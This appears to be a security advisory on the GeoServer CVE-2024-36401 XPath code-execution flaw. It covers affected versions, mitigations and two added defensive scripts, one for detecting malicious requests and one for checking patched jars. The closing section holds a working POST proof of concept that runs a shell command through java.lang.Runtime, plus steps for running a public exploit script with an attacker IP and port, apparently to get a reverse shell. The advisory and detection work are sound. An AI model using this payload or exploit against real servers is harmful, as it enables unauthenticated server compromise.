Vulnerable Version
2.23.2, 2.23.6, versions 2.24.0 to 2.24.3, and version 2.25.0
Fixed Version
Update to the latest release
Base Score
9.8 critical
Vendor Description:-
GeoServer is an open-source server written in Java that allows users to share, process and edit geospatial data. Designed for interoperability, it publishes data from any major spatial data source using open standards. GeoServer has evolved to become an easy method of connecting existing information to virtual globes such as Google Earth and NASA World Wind as well as to web-based maps such as OpenLayers, Leaflet, Google Maps and Bing Maps. GeoServer functions as the reference implementation of the Open Geospatial Consortium Web Feature Service standard, and also implements the Web Map Service, Web Coverage Service and Web Processing Service specifications.
CVE-2024-36401 Vulnerability Description:-
The flaw stems from the GeoTools library, which GeoServer depends on, evaluating XPath expressions unsafely. GeoServer uses XPath, a query language for XML documents, to resolve user-supplied property names, and it evaluates those expressions through the commons-jxpath library. Such evaluation should only happen for complex feature types (for example, Application Schema data stores), but GeoServer applies it to simple feature types as well. Because processing maliciously crafted property names can lead to arbitrary code execution, this is a serious risk for every GeoServer instance.
The GeoTools library in GeoServer is in charge of handling feature type property names. Similar to columns in a database table, feature types indicate the attributes that each feature in a geographic dataset may possess, hence defining the schema for features. Although this schema is essential for handling geographical data, the system is susceptible due to the incorrect treatment of feature type properties during XPath evaluation.
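The XPath evaluation described above is reachable only through request fields that carry property names (the WFS `valueReference` / `PropertyName` element or KVP parameter). The following added example, which is not code from GeoServer or from the original post, shows a request-inspection check a defender can run over proxy or WAF captures: a legitimate property name on a simple feature type is a plain attribute path, so any function-call syntax in those fields is flagged, and JVM-style calls of the shape seen in the PoC below are flagged separately. The sample requests are constructed here; the field names and the character allowlist are assumptions, not GeoServer's own validation rules.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Request elements / KVP parameters whose value is handed to the XPath
# evaluator (assumed field set; names compared case-insensitively with
# XML namespaces stripped).
XPATH_FIELDS = {"valuereference", "propertyname"}

# A plain property path on a simple feature type: letters, digits, '_', ':',
# '/', '.', '@', '-'. Parentheses, quotes or commas mean function syntax.
SAFE_PROPERTY = re.compile(r"^[\w:./@\-]+$")

# Hallmarks of JXPath extension-function calls into the JVM (the payload
# shape used in the PoC on this page).
JVM_HINTS = re.compile(r"exec\s*\(|java\.lang\.|Runtime", re.IGNORECASE)


def _local(tag):
    """'{http://ns}valueReference' -> 'valuereference'."""
    return tag.rsplit("}", 1)[-1].lower()


def classify_property(value):
    """Return None for a plain property name, otherwise a reason string."""
    v = (value or "").strip()
    if not v:
        return None
    if JVM_HINTS.search(v):
        return "JVM call in XPath expression"
    if not SAFE_PROPERTY.match(v):
        return "XPath function/predicate syntax in property name"
    return None


def inspect_xml_body(body):
    """Findings for a POST body; each finding is (field, value, reason)."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return [("body", body[:80], "unparseable XML")]
    findings = []
    for el in root.iter():
        if _local(el.tag) in XPATH_FIELDS:
            reason = classify_property(el.text)
            if reason:
                findings.append((_local(el.tag), (el.text or "").strip(), reason))
    return findings


def inspect_query_string(url):
    """Findings for a GET (KVP-encoded) request URL."""
    findings = []
    for key, values in parse_qs(urlsplit(url).query).items():
        if key.lower() in XPATH_FIELDS:
            for v in values:
                reason = classify_property(v)
                if reason:
                    findings.append((key.lower(), v, reason))
    return findings


# Constructed sample traffic: one ordinary GetPropertyValue request and one
# mirroring the PoC body on this page.
BENIGN_BODY = (
    "<wfs:GetPropertyValue service='WFS' version='2.0.0' "
    "xmlns:topp='http://www.openplans.org/topp' "
    "xmlns:wfs='http://www.opengis.net/wfs/2.0'>"
    "<wfs:Query typeNames='topp:states'/>"
    "<wfs:valueReference>topp:STATE_NAME</wfs:valueReference>"
    "</wfs:GetPropertyValue>"
)
SUSPICIOUS_BODY = (
    "<wfs:GetPropertyValue service='WFS' version='2.0.0' "
    "xmlns:topp='http://www.openplans.org/topp' "
    "xmlns:fes='http://www.opengis.net/fes/2.0' "
    "xmlns:wfs='http://www.opengis.net/wfs/2.0'>"
    "<wfs:Query typeNames='sf:archsites'/>"
    "<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),"
    "'touch /tmp/success2')</wfs:valueReference>"
    "</wfs:GetPropertyValue>"
)
BENIGN_URL = ("http://localhost:8080/geoserver/wfs?service=WFS&version=2.0.0"
              "&request=GetPropertyValue&typeNames=topp:states&valueReference=the_geom")
SUSPICIOUS_URL = ("http://localhost:8080/geoserver/wfs?service=WFS&version=2.0.0"
                  "&request=GetPropertyValue&typeNames=sf:archsites"
                  "&valueReference=exec(java.lang.Runtime.getRuntime(),"
                  "'touch%20/tmp/success2')")

if __name__ == "__main__":
    for label, result in (("benign body", inspect_xml_body(BENIGN_BODY)),
                          ("suspicious body", inspect_xml_body(SUSPICIOUS_BODY)),
                          ("benign url", inspect_query_string(BENIGN_URL)),
                          ("suspicious url", inspect_query_string(SUSPICIOUS_URL))):
        print(label, "->", result or "no findings")
```

Both the XML and the KVP form are inspected because WFS accepts the same operation either way; a rule that only looks at POST bodies misses the GET encoding. The allowlist approach is deliberately stricter than signature matching on `exec(`: any function or predicate syntax in a simple-feature property name is abnormal and worth an alert, whatever the called function is.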
Impact and Potential Risks
Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the GeoServer host, potentially leading to full server compromise.
The severity of this vulnerability is heightened by the fact that it can be exploited by unauthenticated attackers, increasing the attack surface.
Mitigation
- A new release and a security patch addressing this vulnerability have been published. Install the update as soon as possible.
Link to download: https://github.com/geoserver/geoserver/tags
https://github.com/geotools/geotools/tags
- Patched gt-app-schema, gt-complex, and gt-xsd-core jar files are available for versions 2.25.1, 2.24.3, 2.24.2, 2.23.2, 2.21.5, 2.20.7, 2.20.4, 2.19.2, and 2.18.0 from https://geoserver.org. To remediate, replace the corresponding files in the affected system's WEB-INF/lib.
Other protective measures
If updates cannot be installed right away, the following short-term measure is available. Deleting the gt-complex-x.y.jar file from GeoServer removes the vulnerable code, although it may break some GeoServer functionality (x.y is the GeoTools version, for example gt-complex-31.1.jar in GeoServer 2.25.1). If an extension in use depends on the gt-complex module, the GeoServer deployment may fail to start.
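Both remediation paths above come down to what sits in WEB-INF/lib: the three patched jars must be the replaced versions, and the workaround is verified by the absence of any gt-complex jar. The following added example, which is not code from the GeoServer project or from the original post, inventories those jars from their file names and checks whether the gt-complex removal has been applied. The directory layout is constructed in a temporary folder with empty placeholder files so the script runs offline; the jar naming pattern (module-version.jar, as in the gt-complex-31.1.jar name quoted above) is an assumption drawn from that example.

```python
import re
import tempfile
from pathlib import Path

# The modules the advisory names as patched; gt-complex is also the module
# the short-term workaround removes.
PATCHED_MODULES = ("gt-app-schema", "gt-complex", "gt-xsd-core")

# Assumed file naming: <module>-<version>.jar, e.g. gt-complex-31.1.jar
JAR_RE = re.compile(
    r"^(?P<module>gt-[a-z0-9-]+?)-(?P<version>\d+(?:\.\d+)*(?:-SNAPSHOT)?)\.jar$"
)


def inventory(lib_dir):
    """Map module name -> version for the GeoTools jars of interest."""
    found = {}
    for p in Path(lib_dir).glob("gt-*.jar"):
        m = JAR_RE.match(p.name)
        if m and m.group("module") in PATCHED_MODULES:
            found[m.group("module")] = m.group("version")
    return found


def workaround_applied(lib_dir):
    """True when no gt-complex jar remains in WEB-INF/lib."""
    return "gt-complex" not in inventory(lib_dir)


def report(lib_dir):
    """Human-readable summary lines for an operator."""
    inv = inventory(lib_dir)
    lines = [f"{mod}: {inv.get(mod, 'absent')}" for mod in PATCHED_MODULES]
    lines.append("gt-complex removal workaround: "
                 + ("applied" if workaround_applied(lib_dir) else "not applied"))
    return lines


def demo():
    """Build a constructed WEB-INF/lib, inventory it, then apply the workaround."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp) / "WEB-INF" / "lib"
        lib.mkdir(parents=True)
        # Constructed placeholder jars mirroring a GeoServer 2.25.1 deployment
        # (GeoTools 31.1, as quoted in the text above); gt-main is present to
        # show that unrelated gt-* jars are ignored.
        for name in ("gt-complex-31.1.jar", "gt-app-schema-31.1.jar",
                     "gt-xsd-core-31.1.jar", "gt-main-31.1.jar"):
            (lib / name).touch()
        before = inventory(lib)
        applied_before = workaround_applied(lib)
        # Apply the advisory's workaround: remove the gt-complex jar.
        for jar in lib.glob("gt-complex-*.jar"):
            jar.unlink()
        after = inventory(lib)
        applied_after = workaround_applied(lib)
        return {
            "before": before,
            "after": after,
            "workaround_before": applied_before,
            "workaround_after": applied_after,
        }


if __name__ == "__main__":
    result = demo()
    print("before removal:", result["before"], "| workaround:", result["workaround_before"])
    print("after removal: ", result["after"], "| workaround:", result["workaround_after"])
```

Run it against a real deployment by calling `report("/path/to/geoserver/WEB-INF/lib")`; compare the reported versions with the patched versions listed above rather than relying on the GeoServer version alone, since a jar replaced by hand will not change the version string the web interface shows.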
POC
The POST method POC is:
POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>

The touch command then creates success2 under /tmp on the server, confirming that the payload ran.

Gaining RCE via the public exploit script
Repository Setup
git clone https://github.com/Chocapikk/CVE-2024-36401.git
cd CVE-2024-36401
Then install the required libraries using pip:
pip install -r requirements.txt
To exploit a single target, use the following command with the required parameters:
python exploit.py -u -ip -rp [--proxy ] [--bind-host ] [--bind-port ]
Example:-
python exploit.py -u http://localhost:8080 -ip 192.168.1.36 -rp 1337 --proxy http://127.0.0.1:8081

POC Video:-
https://www.youtube.com/watch?v=jNj7bRbO1ww
Reference:-
https://github.com/Chocapikk/CVE-2024-36401
https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.md
